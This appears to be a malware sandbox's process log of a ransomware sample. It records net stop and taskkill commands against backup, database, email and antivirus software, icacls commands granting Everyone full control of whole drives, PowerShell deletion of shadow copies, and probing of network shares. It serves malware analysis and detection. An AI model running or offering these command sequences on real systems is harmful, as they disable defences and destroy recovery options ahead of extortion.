C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.722⤵
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.732⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.692⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.722⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp5D64.bat2⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-174406157-2996576256469084929546508231818130888750940726-475893272921936653"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1442862191842807354897238197-1119279843-3595806751434065987-929072415686844325"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1210436873-5798953911995958198369311200-1199445987578639492-5827318121869410712"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1773512490-1498629127-868604017-1022273264651763535-1328087032206737441119957216"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10982192522025370419-1281988225797824464-37032824682050333-6627162991085109414"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1370275115112028864-1917014727132946653-530594036635847806237850284-660725371"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-42310619-84736955-726907286-24811998010211163101433649576-2429790761832249"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20737699442034268348-881860049-1126400180-1928638330-93395001915321563921598775521"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-46709280028540808410400297341043488967-1971617530-11711968271892197166-466889067"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-971858531-16528390431803397547658616896-1670624584-45019670765321423-314737253"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "857833656673643443347936296-1835709109-925845613-771890074924585731144267580"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2196769441195462857-493998581-1712167807-1946495898-21360983163820247501804937311"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1867802669-1953500870-74964786021222746178482893589562468971250099131-1764584998"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12218419535624806038096308271986247862-2046363985-78998736043766099940172332"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1384263376-440832631847382257-2051979655841875630-21078433471599560508-1753331020"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18547837420988912421765150475-533867627-1030907410-2115308258-579564661-95667560"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5767529381630722626879150750127123-524206760-1647493318-1602594781-468025879"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1064070026-7346328131237747700-1808123452238872649-1010933266-712346161368959287"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1419743114-1957126588-1302501146644070575-1903147339-1286612593-5188440962092998182"1⤵
-
